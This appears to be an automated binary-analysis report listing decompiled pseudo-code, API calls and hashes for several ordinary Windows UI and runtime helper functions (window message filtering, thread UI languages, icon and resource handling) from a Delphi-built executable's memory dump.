                                                                    • Instruction ID: de5110e5fa14fd350821f7972f2051635d336fb801c9b7b6397190480774c976
                                                                    • Opcode Fuzzy Hash: cda95d6e92defb5476691493b7d59d62c1fa9335c75e1bc5c16bb959f18c3f17
                                                                    • Instruction Fuzzy Hash: 48F0FF31B05524AFEB10EB49FC41B5A6B9BDB85310F50213AF184C3281E631DC018BA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C86E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 47%
                                                                    			E005C86E0(void* __eax, void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				void* _t3;
				void* _t7;
				void* _t12;
				intOrPtr* _t13;

				_t8 = __ecx;
				_push(__ecx);
				_t7 = __edx;
				_t12 = __eax;
				if( *0x6d57f0 == 0) {
					 *0x6d57f4 = E00414020(_t7, _t12, GetModuleHandleW(L"user32.dll"), L"ChangeWindowMessageFilterEx");
					 *_t13 = 0x6d57f0;
					asm("lock xchg [edx], eax");
				}
				if( *0x6d57f4 == 0) {
					_t3 = E005C8644(_t7, _t8);
				} else {
					_t3 =  *0x6d57f4(_t12, _t7, 1, 0);
				}
				return _t3;
			}









                                                                    0x005c86e0
                                                                    0x005c86e2
                                                                    0x005c86e3
                                                                    0x005c86e5
                                                                    0x005c86ee
                                                                    0x005c8705
                                                                    0x005c870a
                                                                    0x005c8719
                                                                    0x005c8719
                                                                    0x005c8723
                                                                    0x005c8735
                                                                    0x005c8725
                                                                    0x005c872b
                                                                    0x005c872b
                                                                    0x005c873d

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C86FA
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                      • Part of subcall function 005C8644: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                                    • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C872B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressChangeFilterMessageProcWindow
                                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                    • API String ID: 989041661-2676053874
                                                                    • Opcode ID: 069d2c8e1b8fc22a779199f9f95faad227b90f375a0982a66332104caa2a493e
                                                                    • Instruction ID: 33574298acf09a9ab3b8dc906f6acd80ea038e69245e9512450f7745a5549cab
                                                                    • Opcode Fuzzy Hash: 069d2c8e1b8fc22a779199f9f95faad227b90f375a0982a66332104caa2a493e
                                                                    • Instruction Fuzzy Hash: F7F0A070702610DFD715EBA9AC89F662FE6EB84345F30142EF1069B691DBB60880C699
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004698FC, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E004698FC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* _a4, signed short _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t30;
				void* _t67;
				void* _t68;
				intOrPtr _t73;
				intOrPtr _t77;
				char _t78;
				intOrPtr _t82;
				signed short _t93;
				void* _t96;
				void* _t98;
				void* _t99;
				intOrPtr _t100;

				_t78 = __edx;
				_t68 = __ecx;
				_t98 = _t99;
				_t100 = _t99 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t100 = _t100 + 0xfffffff0;
					_t30 = E00408A40(_t30, _t98);
				}
				_t96 = _t68;
				_v5 = _t78;
				_t67 = _t30;
				_t93 = _a8;
				_push(_t98);
				_push(0x469a4c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t100;
				if((0x0000ff00 & _t93) != 0xff00) {
					E0046976C(E004236A4(_t96, _t93 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t67 + 4)) == 0xffffffff) {
						E00423BD0(_t96,  &_v36);
						_v24 = _v36;
						_v20 = 0x11;
						E00427D54(GetLastError(), _t67, 0, _t96);
						_v16 = _v40;
						_v12 = 0x11;
						_t73 =  *0x6cd8a8; // 0x415564
						E00429100(_t67, _t73, 1, _t93, _t96, 1,  &_v24);
						E004098C4();
					}
				} else {
					_t94 = _t93 & 0x000000ff;
					if((_t93 & 0x000000ff) == 0xff) {
						_t94 = 0x10;
					}
					E0046976C(E004236FC(_t96, _t94 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t67 + 4)) == 0xffffffff) {
						E00423BD0(_t96,  &_v28);
						_v24 = _v28;
						_v20 = 0x11;
						E00427D54(GetLastError(), _t67, 0, _t96);
						_v16 = _v32;
						_v12 = 0x11;
						_t77 =  *0x6ce1a8; // 0x41555c
						E00429100(_t67, _t77, 1, _t94, _t96, 1,  &_v24);
						E004098C4();
					}
				}
				_t28 = _t67 + 8; // 0x443d54
				E0040A5A8(_t28, _t96);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(E00469A53);
				return E0040A228( &_v40, 4);
			}
























                                                                    0x004698fc
                                                                    0x004698fc
                                                                    0x004698fd
                                                                    0x004698ff
                                                                    0x00469907
                                                                    0x0046990a
                                                                    0x0046990d
                                                                    0x00469910
                                                                    0x00469915
                                                                    0x00469917
                                                                    0x0046991a
                                                                    0x0046991a
                                                                    0x0046991f
                                                                    0x00469921
                                                                    0x00469924
                                                                    0x00469926
                                                                    0x0046992b
                                                                    0x0046992c
                                                                    0x00469931
                                                                    0x00469934
                                                                    0x00469942
                                                                    0x004699d2
                                                                    0x004699db
                                                                    0x004699e2
                                                                    0x004699ea
                                                                    0x004699ed
                                                                    0x004699fb
                                                                    0x00469a03
                                                                    0x00469a06
                                                                    0x00469a10
                                                                    0x00469a1d
                                                                    0x00469a22
                                                                    0x00469a22
                                                                    0x00469944
                                                                    0x00469944
                                                                    0x0046994e
                                                                    0x00469950
                                                                    0x00469950
                                                                    0x00469967
                                                                    0x00469970
                                                                    0x0046997b
                                                                    0x00469983
                                                                    0x00469986
                                                                    0x00469994
                                                                    0x0046999c
                                                                    0x0046999f
                                                                    0x004699a9
                                                                    0x004699b6
                                                                    0x004699bb
                                                                    0x004699bb
                                                                    0x00469970
                                                                    0x00469a27
                                                                    0x00469a2c
                                                                    0x00469a33
                                                                    0x00469a36
                                                                    0x00469a39
                                                                    0x00469a4b

                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 0046998A
                                                                      • Part of subcall function 004236A4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D4C,004699CC,00000000,00469A4C,?,?,00443D4C), ref: 004236F3
                                                                      • Part of subcall function 00423BD0: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D4C,004699E7,00000000,00469A4C,?,?,00443D4C,00000001), ref: 00423BF3
                                                                    • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 004699F1
                                                                      • Part of subcall function 00427D54: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427D78
                                                                      • Part of subcall function 00427D54: LocalFree.KERNEL32(00000001,00427DD1,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427DC4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                                    • String ID: \UA$dUA
                                                                    • API String ID: 503893064-3864016770
                                                                    • Opcode ID: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
                                                                    • Instruction ID: 123e0454fb2a9dec89cd9e8203dbd653fcf04e778e7e37e714b9737e464d7bf3
                                                                    • Opcode Fuzzy Hash: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
                                                                    • Instruction Fuzzy Hash: 8641A370B002599FDB00EFA6C8815EEBBF5AF58314F40812AE914A7382D77D5E05CB6A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040DE74, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E0040DE74(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x6d1c0c()) {
					_v16 = E0040DE30( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x6d1c08(4,  &_v32,  &_v20);
				}
				_t39 = E0040DE30( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E0040B2DC(_t81, _t67);
					_t39 = E00406F28(_t67);
				}
				if(_v16 != 0) {
					 *0x6d1c08(0, 0,  &_v20);
					_t68 = E0040DE30( &_v12);
					if(_v8 != _v12 || E0040DE0C(_v16, _v12, _t68) != 0) {
						 *0x6d1c08(8, _v16,  &_v20);
					}
					E00406F28(_t68);
					return E00406F28(_v16);
				}
				return _t39;
			}





















                                                                    0x0040de7c
                                                                    0x0040de7e
                                                                    0x0040de82
                                                                    0x0040de8e
                                                                    0x0040de98
                                                                    0x0040de9b
                                                                    0x0040de9d
                                                                    0x0040dea4
                                                                    0x0040dea7
                                                                    0x0040deb8
                                                                    0x0040debe
                                                                    0x0040dec1
                                                                    0x0040dec4
                                                                    0x0040dec7
                                                                    0x0040decd
                                                                    0x0040ded3
                                                                    0x0040dee3
                                                                    0x0040dee3
                                                                    0x0040deec
                                                                    0x0040def1
                                                                    0x0040def5
                                                                    0x0040defa
                                                                    0x0040deff
                                                                    0x0040df01
                                                                    0x0040df02
                                                                    0x0040df09
                                                                    0x0040df11
                                                                    0x0040df16
                                                                    0x0040df16
                                                                    0x0040df1c
                                                                    0x0040df1f
                                                                    0x0040df1f
                                                                    0x0040df09
                                                                    0x0040df26
                                                                    0x0040df2d
                                                                    0x0040df2d
                                                                    0x0040df36
                                                                    0x0040df40
                                                                    0x0040df4e
                                                                    0x0040df56
                                                                    0x0040df73
                                                                    0x0040df73
                                                                    0x0040df7b
                                                                    0x00000000
                                                                    0x0040df83
                                                                    0x0040df8d

                                                                    APIs
                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73
                                                                      • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
                                                                      • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                    • String ID:
                                                                    • API String ID: 2255706666-0
                                                                    • Opcode ID: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                                    • Instruction ID: 69b1dabfcf83cd92044bbbe7d095353c7cd2b80021ffbfb9d1b785f1729ac455
                                                                    • Opcode Fuzzy Hash: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                                    • Instruction Fuzzy Hash: 63317070E1021A9BCB10DFE9D884AAEB7B5FF14305F40417AE516FB2D1D7789A09CB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005CE374, Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005CE374(intOrPtr* __eax, int __ecx, int __edx, int _a4, int _a8) {
				int _v8;
				int _v12;
				int _t31;
				intOrPtr* _t41;
				int _t54;
				int _t55;

				_v8 = __ecx;
				_t54 = __edx;
				_t41 = __eax;
				MulDiv( *(__eax + 0x50), __edx, _v8);
				_v12 = MulDiv( *(_t41 + 0x54), _a8, _a4);
				if(( *(_t41 + 0x61) & 0x00000001) != 0) {
					_t55 =  *(_t41 + 0x58);
				} else {
					_t55 = MulDiv( *(_t41 + 0x58), _t54, _v8);
				}
				if(( *(_t41 + 0x61) & 0x00000002) != 0) {
					_t31 =  *(_t41 + 0x5c);
				} else {
					_t31 = MulDiv( *(_t41 + 0x5c), _a8, _a4);
				}
				return  *((intOrPtr*)( *_t41 + 0xc8))(_t31, _t55);
			}









                                                                    0x005ce37d
                                                                    0x005ce380
                                                                    0x005ce382
                                                                    0x005ce38d
                                                                    0x005ce3a5
                                                                    0x005ce3ac
                                                                    0x005ce3c0
                                                                    0x005ce3ae
                                                                    0x005ce3bc
                                                                    0x005ce3bc
                                                                    0x005ce3c7
                                                                    0x005ce3dc
                                                                    0x005ce3c9
                                                                    0x005ce3d5
                                                                    0x005ce3d5
                                                                    0x005ce3f6

                                                                    APIs
                                                                    • MulDiv.KERNEL32(?,0068D5D0,?), ref: 005CE38D
                                                                    • MulDiv.KERNEL32(?,005CE4BF,0068D5D0), ref: 005CE3A0
                                                                    • MulDiv.KERNEL32(?,0068D5D0,?), ref: 005CE3B7
                                                                    • MulDiv.KERNEL32(?,005CE4BF,0068D5D0), ref: 005CE3D5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac23038dacf6796b57d110ed30358184083c47a134689276074c101833fe842e
                                                                    • Instruction ID: 3e71b6adc286f200af4aaafaaf3a8fca573aba72415269075ac824ff0f327e96
                                                                    • Opcode Fuzzy Hash: ac23038dacf6796b57d110ed30358184083c47a134689276074c101833fe842e
                                                                    • Instruction Fuzzy Hash: B9113072A04244AFCB44DEDDD8C5E9F7BEDEF48364B144499F908DB242C678ED808BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F53AC, Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 67%
                                                                    			E004F53AC(intOrPtr* __eax, struct HICON__* __edx, void* __eflags) {
				intOrPtr* _v8;
				struct _ICONINFO _v28;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				intOrPtr _t33;
				intOrPtr _t45;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xffffffd0;
				_v8 = __eax;
				E004F5338(_v8, __edx);
				if(__edx == 0 || GetIconInfo(__edx,  &_v28) == 0) {
					return  *((intOrPtr*)( *_v8 + 0x10))();
				} else {
					_push(_t49);
					_push(0x4f5429);
					_push( *[fs:edx]);
					 *[fs:edx] = _t52;
					if(GetObjectW(_v28.hbmColor, 0x18,  &_v52) != 0) {
						_t33 =  *((intOrPtr*)(_v8 + 0x28));
						 *((intOrPtr*)(_t33 + 0xc)) = _v48;
						 *((intOrPtr*)(_t33 + 0x10)) = _v44;
					}
					_pop(_t45);
					 *[fs:eax] = _t45;
					_push(E004F5430);
					DeleteObject(_v28.hbmMask);
					return DeleteObject(_v28.hbmColor);
				}
			}













                                                                    0x004f53ad
                                                                    0x004f53af
                                                                    0x004f53b5
                                                                    0x004f53bf
                                                                    0x004f53c6
                                                                    0x004f543f
                                                                    0x004f53d6
                                                                    0x004f53d8
                                                                    0x004f53d9
                                                                    0x004f53de
                                                                    0x004f53e1
                                                                    0x004f53f5
                                                                    0x004f53fa
                                                                    0x004f5400
                                                                    0x004f5406
                                                                    0x004f5406
                                                                    0x004f540b
                                                                    0x004f540e
                                                                    0x004f5411
                                                                    0x004f541a
                                                                    0x004f5428
                                                                    0x004f5428

                                                                    APIs
                                                                    • GetIconInfo.USER32(00000000,00000000), ref: 004F53CD
                                                                    • GetObjectW.GDI32(0068D5D0,00000018,00000000,00000000,004F5429,?,004C0068), ref: 004F53EE
                                                                    • DeleteObject.GDI32(?), ref: 004F541A
                                                                    • DeleteObject.GDI32(0068D5D0), ref: 004F5423
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Object$Delete$IconInfo
                                                                    • String ID:
                                                                    • API String ID: 507670407-0
                                                                    • Opcode ID: 939d8cbd648baad16ebc5502745bc899ef72b4fd7c693fad9428492138ac7e12
                                                                    • Instruction ID: 4322d414b200eb17045e09ec041732102b9da4c87ad94fc4c4d540c0fc3291bf
                                                                    • Opcode Fuzzy Hash: 939d8cbd648baad16ebc5502745bc899ef72b4fd7c693fad9428492138ac7e12
                                                                    • Instruction Fuzzy Hash: 2B11A375A00608AFCB04DFA6D981DAEB7F9EF88314B5081AAFE04D3351DB38DE408B54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005B9590, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E005B9590(signed char __eax, intOrPtr _a4) {
				int _t22;
				void* _t23;
				int _t31;
				signed int _t35;
				signed char _t38;
				void* _t43;
				void* _t44;

				_t38 = __eax;
				_t2 = _a4 - 4; // 0xc31852ff
				_t22 = IsWindowVisible( *( *_t2 + 0x188));
				asm("sbb eax, eax");
				_t23 = _t22 + 1;
				_t43 = _t23 -  *0x6cccd4; // 0x0
				if(_t43 == 0) {
					_t44 = _t38 -  *0x6cccd4; // 0x0
					if(_t44 != 0) {
						_t5 = _a4 - 4; // 0xc31852ff
						if( *((char*)( *_t5 + 0xeb)) != 0 &&  *0x6cccd4 == 0) {
							_t8 = _a4 - 4; // 0xc31852ff
							_t35 = GetWindowLongW( *( *_t8 + 0x188), 0xffffffec);
							_t11 = _a4 - 4; // 0xc31852ff
							SetWindowLongW( *( *_t11 + 0x188), 0xffffffec, _t35 | 0x08000000);
						}
						_t16 = _a4 - 4; // 0xc31852ff
						_t31 = SetWindowPos( *( *_t16 + 0x188), 0, 0, 0, 0, 0,  *(0x6cccd6 + (_t38 & 0x000000ff) * 2) & 0x0000ffff);
						 *0x6cccd4 = _t38;
						return _t31;
					}
				}
				return _t23;
			}










                                                                    0x005b9594
                                                                    0x005b9599
                                                                    0x005b95a3
                                                                    0x005b95ab
                                                                    0x005b95ad
                                                                    0x005b95ae
                                                                    0x005b95b4
                                                                    0x005b95b6
                                                                    0x005b95bc
                                                                    0x005b95c1
                                                                    0x005b95cb
                                                                    0x005b95d9
                                                                    0x005b95e5
                                                                    0x005b95ed
                                                                    0x005b95ff
                                                                    0x005b95ff
                                                                    0x005b961d
                                                                    0x005b9627
                                                                    0x005b962c
                                                                    0x00000000
                                                                    0x005b962c
                                                                    0x005b95bc
                                                                    0x005b9634

                                                                    APIs
                                                                    • IsWindowVisible.USER32 ref: 005B95A3
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
                                                                    • SetWindowLongW.USER32 ref: 005B95FF
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$Long$Visible
                                                                    • String ID:
                                                                    • API String ID: 2967648141-0
                                                                    • Opcode ID: c53b897a5a1d9d2e71e6f85843be0105534f78b66b69f438aa9e828b25e0526c
                                                                    • Instruction ID: de5a40ccb5800a4cef2b87037ee72a09c9fd5293aebedbf233be07227e7c069f
                                                                    • Opcode Fuzzy Hash: c53b897a5a1d9d2e71e6f85843be0105534f78b66b69f438aa9e828b25e0526c
                                                                    • Instruction Fuzzy Hash: B31161742851446FDB00DB28D888FFA7FE9AB45324F458191F988CB362CA38ED80CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0046A218, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 80%
                                                                    			E0046A218(void* __eax, struct HINSTANCE__* __edx, WCHAR* _a8) {
				WCHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				WCHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceW(__edx, _v8, _a8);
				 *(_t23 + 0x10) = _t29;
				if(_t29 == 0) {
					E0046A178(_t23, _t24, _t29, _t31, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x46a2b4
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				if(_t30 == 0) {
					E0046A178(_t23, _t24, _t30, _t31, _t32);
				}
				_t7 = _t23 + 0x10; // 0x46a2b4
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x469b00
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00469AAC(_t23, _t25, _t18);
			}

















                                                                    0x0046a21f
                                                                    0x0046a222
                                                                    0x0046a224
                                                                    0x0046a234
                                                                    0x0046a236
                                                                    0x0046a23b
                                                                    0x0046a23e
                                                                    0x0046a243
                                                                    0x0046a243
                                                                    0x0046a244
                                                                    0x0046a24e
                                                                    0x0046a250
